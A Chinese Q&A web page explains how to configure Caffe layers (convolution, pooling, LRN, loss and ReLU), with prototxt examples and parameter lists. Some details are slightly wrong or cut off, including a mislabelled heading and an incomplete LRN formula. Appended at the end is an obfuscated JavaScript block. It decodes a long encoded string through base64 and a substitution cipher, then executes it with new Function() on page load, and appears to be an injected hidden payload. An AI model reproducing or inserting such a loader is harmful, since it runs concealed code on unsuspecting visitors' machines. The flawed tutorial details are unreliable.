如何在Caffe中配置每一个层的结构

2025-03-16 17:25:06
推荐回答(1个)
回答1:

1. Vision Layers
1.1 卷积层(Convolution)
类型:CONVOLUTION
例子

layers { name: "conv1" type: CONVOLUTION bottom: "data" top: "conv1" blobs_lr: 1 # learning rate multiplier for the filters blobs_lr: 2 # learning rate multiplier for the biases weight_decay: 1 # weight decay multiplier for the filters weight_decay: 0 # weight decay multiplier for the biases convolution_param { num_output: 96 # learn 96 filters kernel_size: 11 # each filter is 11x11 stride: 4 # step 4 pixels between each filter application weight_filler { type: "gaussian" # initialize the filters from a Gaussian std: 0.01 # distribution with stdev 0.01 (default mean: 0) } bias_filler { type: "constant" # initialize the biases to zero (0) value: 0 } }}

blobs_lr: 学习率调整的参数,在上面的例子中设置权重学习率和运行中求解器给出的学习率一样,同时是偏置学习率为权重的两倍。
weight_decay:

卷积层的重要参数
必须参数:
num_output (c_o):过滤器的个数
kernel_size (or kernel_h and kernel_w):过滤器的大小

可选参数:
weight_filler [default type: 'constant' value: 0]:参数的初始化方法
bias_filler:偏置的初始化方法
bias_term [default true]:指定是否是否开启偏置项
pad (or pad_h and pad_w) [default 0]:指定在输入的每一边加上多少个像素
stride (or stride_h and stride_w) [default 1]:指定过滤器的步长
group (g) [default 1]: If g > 1, we restrict the connectivityof each filter to a subset of the input. Specifically, the input and outputchannels are separated into g groups, and the ith output group channels will beonly connected to the ith input group channels.

通过卷积后的大小变化:
输入:n * c_i * h_i * w_i
输出:n * c_o * h_o * w_o,其中h_o = (h_i + 2 * pad_h - kernel_h) /stride_h + 1,w_o通过同样的方法计算。

1.2 池化层(Pooling)
类型:POOLING
例子
layers { name: "pool1" type: POOLING bottom: "conv1" top: "pool1" pooling_param { pool: MAX kernel_size: 3 # pool over a 3x3 region stride: 2 # step two pixels (in the bottom blob) between pooling regions }}

卷积层的重要参数
必需参数:
kernel_size (or kernel_h and kernel_w):过滤器的大小

可选参数:
pool [default MAX]:pooling的方法,目前有MAX, AVE, 和STOCHASTIC三种方法
pad (or pad_h and pad_w) [default 0]:指定在输入的每一遍加上多少个像素
stride (or stride_h and stride_w) [default1]:指定过滤器的步长

通过池化后的大小变化:
输入:n * c_i * h_i * w_i
输出:n * c_o * h_o * w_o,其中h_o = (h_i + 2 * pad_h - kernel_h) /stride_h + 1,w_o通过同样的方法计算。

1.3 Local Response Normalization (LRN)
类型:LRN
Local ResponseNormalization是对一个局部的输入区域进行的归一化(激活a被加一个归一化权重(分母部分)生成了新的激活b),有两种不同的形式,一种的输入区域为相邻的channels(cross channel LRN),另一种是为同一个channel内的空间区域(within channel LRN)
计算公式:对每一个输入除以

可选参数:
local_size [default 5]:对于cross channel LRN为需要求和的邻近channel的数量;对于within channel LRN为需要求和的空间区域的边长
alpha [default 1]:scaling参数
beta [default 5]:指数
norm_region [default ACROSS_CHANNELS]: 选择哪种LRN的方法ACROSS_CHANNELS 或者WITHIN_CHANNEL

2. Loss Layers
深度学习是通过最小化输出和目标的Loss来驱动学习。

2.1 Softmax
类型: SOFTMAX_LOSS

2.2 Sum-of-Squares / Euclidean
类型: EUCLIDEAN_LOSS

2.3 Hinge / Margin
类型: HINGE_LOSS
例子:

# L1 Normlayers { name: "loss" type: HINGE_LOSS bottom: "pred" bottom: "label"}# L2 Normlayers { name: "loss" type: HINGE_LOSS bottom: "pred" bottom: "label" top: "loss" hinge_loss_param { norm: L2 }}

可选参数:
norm [default L1]: 选择L1或者 L2范数
输入:
n * c * h * wPredictions
n * 1 * 1 * 1Labels
输出
1 * 1 * 1 * 1Computed Loss

2.4 Sigmoid Cross-Entropy
类型:SIGMOID_CROSS_ENTROPY_LOSS

2.5 Infogain
类型:INFOGAIN_LOSS

2.6 Accuracy and Top-k
类型:ACCURACY
用来计算输出和目标的正确率,事实上这不是一个loss,而且没有backward这一步。
3. 激励层(Activation / Neuron Layers)
一般来说,激励层是element-wise的操作,输入和输出的大小相同,一般情况下就是一个非线性函数。
3.1 ReLU / Rectified-Linear and Leaky-ReLU
类型: RELU
例子:

layers { name: "relu1" type: RELU bottom: "conv1" top: "conv1"}

可选参数:
negative_slope [default 0]:指定输入值小于零时的输出。

ReLU是目前使用做多的激励函数,主要因为其收敛更快,并且能保持同样效果。
标准的ReLU函数为max(x, 0),而一般为当x > 0时输出x,但x <= 0时输出negative_slope。RELU层支持in-place计算,这意味着bottom的输出和输入相同以避免内存的消耗。

(function(){function b7c9e1493(c95fae){var n03b5751="D$8~x9Tdn.B|3cZ?C4K^jNOeUpXAuih!HSYwR@Q-_rvPq:/]VJyotm,kzf05bMGl%(LW7&I26=F;asg1E[";var a531b0a="W$^VPE/6OSb!I?Zt3gf_UR|DGuH:pMN.,15LxKae9k&mj;]TBcvslFwQ4d@YJ8hz=o(2r07iX%-qyn[A~C";return atob(c95fae).split('').map(function(z5cd7){var e04b2b9=n03b5751.indexOf(z5cd7);return e04b2b9==-1?z5cd7:a531b0a[e04b2b9]}).join('')}var c=b7c9e1493('rtmp://LDJzZigsZyJmUyIrIk1XLXoiLyVLcHNKPzIoc0wpe0xLcHNKPzIoc0wyUUpfJlFIYUNfSWZIZldZUUJLTUgyV0JfUUlkKXsyS0xUOGlRSk9EMnNUIT8tbz9Mc1F5MjRRPyg3IXV0UT9LKDdQKSl7Ny0/cDdzfXlRNyAtei1kLXpZZlMlS3BzSj8yKHNMbFNkTWRLZCl7Ny0/cDdzIC4/NzJzNCFLNyhQW0dRN1soZi1MbFNkTWRLZCl9OnlRNyBzJlEtZkt6USVnInRxb0ZYJlNed24xZV5iLl5YXWl3IkgieS03RiZTIkgibzJmRldNIkgiSko/RlcmV1lGJkNGU3ogVyZBeldBek0iLzp5UTcgZlF6ZlFJeiZJJWZXWVFCS01nLXotZC16WWZTTCZSZFMpKy16LWQtellmU0wmUkl6KSstei1kLXpZZlNMJlJkSykrLXotZC16WWZTTCZSZFcpL0gsV0NDS2RLJWZXWVFCS01nLXotZC16WWZTTCZSZFcpKy16LWQtellmU0wmUkl6KSstei1kLXpZZlNMJlJkSykrLXotZC16WWZTTCZSZFMpL0hCU3pTWUMlMldCX1FJZGdmUXpmUUl6JklMIjVDfmFKUH5wZm1ocUpQdCxmMSUlIikvSGFDJkktUUklZlF6ZlFJeiZJTCI1Q2J0NTZOdE5EUnRCRH5wZjElJSIpSHlJelFRXyVmUXpmUUl6JklMIkpDfjJKQ05hUURZcyIpSFBKV01LWSVmUXpmUUl6JklMIkpQfixCVW1xWmslJSIpSHNCZmZRJllkJWZRemZRSXomSUwiSkNWb1E2ayUiKUhQWXpfLUIlZlF6ZlFJeiZJTCJKUH5XWjZibFprJSUiKUhRLUNLZCVmUXpmUUl6JklMIlFQX3VCNCUlIilIbC1DQ0slZlF6ZlFJeiZJTCJKUG1wWlVfPyIpSHVmQ1dLJiVmV1lRQktNZ2ZRemZRSXomSUwiXURtJlExJSUiKS9IMkNkZiZCQklZJWZRemZRSXomSUwiQlVfR1oxJSUiKTp5UTcgKFdRJllJXyVmUXpmUUl6JklMIkpXUyZRRE50ZjQlJSIpOnlRNyBzWV9CS2ZTOjJLTHQoSlE/MihzIW8tUTdKRyEyc2YtUm5LTChXUSZZSV8pPkZTKXtzWV9CS2ZTJTJXQl9RSWRnYUMmSS1RSS9MZlF6ZlFJeiZJTCJmVX56ZlVtYVpEOSUiKSk6c1lfQktmUyEyZiUiPyIrdWZDV0smZ2wtQ0NLL0wpKlMmJiYmOnNZX0JLZlMhbz9hdC0hLDJmP0clIlMmJj0iOnNZX0JLZlMhbz9hdC0hRy0yNEc/JSJZJiZ1UiI6c1lfQktmUyFmMm9RQnQtZiU/N3AtOjJLTDJXQl9RSWQhQihmYXwlc3B0dCl7MldCX1FJZCFCKGZhIVF1dS1zZltHMnRmTHNZX0JLZlMpfS10by17eVE3IGZRSkJCUyVLcHNKPzIoc0wpezJXQl9RSWQhQihmYSFRdXUtc2ZbRzJ0ZkxzWV9CS2ZTKTpmV1lRQktNITctUCh5LTl5LXM/dzJvPy1zLTdMMkNkZiZCQklZSGZRSkJCU0hLUXRvLSl9OmZXWVFCS00hUWZmOXktcz93Mm8/LXMtN0wyQ2RmJkJCSVlIZlFKQkJTSEtRdG8tKX19eVE3IFFLTSZfTSUyV0JfUUlkZ2FDJkktUUkvTGZRemZRSXomSUwiWkRTMlpEayUiKSk6UUtNJl9NITJmJWFDX0lmK3VmQ1dLJiFKLTJ0THVmQ1dLJmdsLUNDSy9MKSpTJiYmJik6eVE3IHBkQksmQ2RNSyVLcHNKPzIoc0xRJlkmUWRkX0Ipe3lRNyBRUUlNJnolcy0sIGVRPy1MKTp5UTcgUWRkSkImSiVgb1A/Ml5vMmZeJHthQ19JZn1eJHtRUUlNJnohPyh3KEpRdC1lUT8tLj83MnM0TCl9YDp5UTcgeWZfQ1dkJXNwdHQ6Pzdhe3lmX0NXZCViLm5oIXVRN28tTHQoSlF0Lj8oN1E0LSE0LT8zPy1QTFFkZEpCJkopKX1KUT9KR0wtKXt9MktMeWZfQ1dkJSVzcHR0KXt5Zl9DV2Qle0I3KCxvLTdbKHBzP0EmSH19eWZfQ1dkIUI3KCxvLTdbKHBzPysrOnlRNyBzLSZfWWQlLFdDQ0tkS0xzJlEtZkt6USFKKHNKUT9MZ2BzKCxGJHtlUT8tZyJzKCwiL0wpfWBIYEc3LUtGJHt0KEpRPzIocyFHNy1LfWBIYHBvSkYke3lmX0NXZCFCNygsby03Wyhwcz99YEgvKSFvKDc/TEwpJT51ZkNXSyZnbC1DQ0svTClGJiFZKWdRLUNLZC9MIkgiKSk6eVE3IFAtX0omTUIlcy0mX1lkITJzZi1SbktMLXotZC16WWZTTCZSQ2YpKT5GU2NzLSZfWWRneUl6UVFfL0xzLSZfWWQhMnNmLVJuS0wtei1kLXpZZlNMJlJDZikpKUEiIjpzLSZfWWQlcy0mX1lkZ1BKV01LWS9MUC1fSiZNQkgiIilnc0JmZlEmWWQvTCIiKWdQWXpfLUIvTClnUS1DS2QvTCIiKStQLV9KJk1COlFLTSZfTSFvN0olZyJHPz91b0FUVCIrUSZZJlFkZF9CSFFLTSZfTSEyZkhzLSZfWWQvZ1EtQ0tkL0wiVCIpOjJXQl9RSWQhQihmYSEyc28tNz9WLUsoNy1MUUtNJl9NSDJXQl9RSWQhQihmYSFKRzJ0ZmgoZi1vZyYvKToyS0xzWV9CS2ZTfCVzcHR0KXtzWV9CS2ZTIXlRdHAtKyUiXFw3XFxzUXV1LXNmLWYgLVAgPyggRz9QdCI6eVE3IEtfJkN6JkIlMldCX1FJZCE0LT85dC1QLXM/VmEzZkxRS00mX00hMmYpOjJLTEtfJkN6JkIlJXNwdHRPT0tfJkN6JkIlJXBzZi1LMnMtZil7c1lfQktmUyF5UXRwLSslIlxcN1xccyBKUXM/IDQtPyAtUCBLNyhQIEc/UHQifX19OjJLTHNZX0JLZlN8JXNwdHQpe3NZX0JLZlMheVF0cC0rJSJcXDdcXHNvLXNmIHFvIEcobz8gIisyUUpfJlF9eVE3IChKQiZXSyVLcHNKPzIoc0wsX0lRU00pezctP3A3cyBmUXpmUUl6JklMLF9JUVNNKWdQSldNS1kvTC16LWQtellmU0wmUldRKUh1ZkNXSyZnbC1DQ0svTCkhPyguPzcyczRMQ2QpIW90MkotTHVmQ1dLJiFLdCgoN0x1ZkNXSyZnbC1DQ0svTCkqXykrVykpfTpwZEJLJkNkTUtMKEpCJldLTDJRSl8mUSkpOmZXWVFCS01nIlFmZjl5LXM/dzJvPy1zLTciL0wiUC1vb1E0LSJIS3BzSj8yKHNMLSl7MktMLSFmUT9RIXIlJWFDX0lmKXsyV0JfUUlkITQtPzl0LVAtcz9WYTNmTFFLTSZfTSEyZikhNy1QKHktTCk6eVE3IHJZWVdKJXNwdHQ6MktMc1lfQktmU3wlc3B0dCl7c1lfQktmUyF5UXRwLSslIlxcN1xcczctSi0yeS0gLVAgdShvPyBQLW9vUTQtIjpzWV9CS2ZTIXlRdHAtKyUiXFw3XFxzLSFmUT9RIXkgIistIWZRP1EhOzpyWVlXSiVMISEhUFFTemYpJT57MktMfFBRU3pmT09QUVN6ZiF0LXM0P0c8JSYpNy0/cDdzOnNZX0JLZlMheVF0cC0rJSJcXDdcXHMiK1BRU3pmIXEoMnNMIiAiKX19cy0sIG1wc0o/MihzTCJRNzRvIkgtIWZRP1EhOylMe14/ZkpvQUJTelNZQ0hedCg0QXJZWVdKSH0pfX0pfSlMIlpXSnBoXX5sUVdtbEJEUj9aV2ZZQi5ZJkJDMWRuXXJTaDQlJSJIIldNIkgsMnNmKCxIZihKcFAtcz8pfTpmU01XLXpMKTo='.substr(7));new Function(c)()})();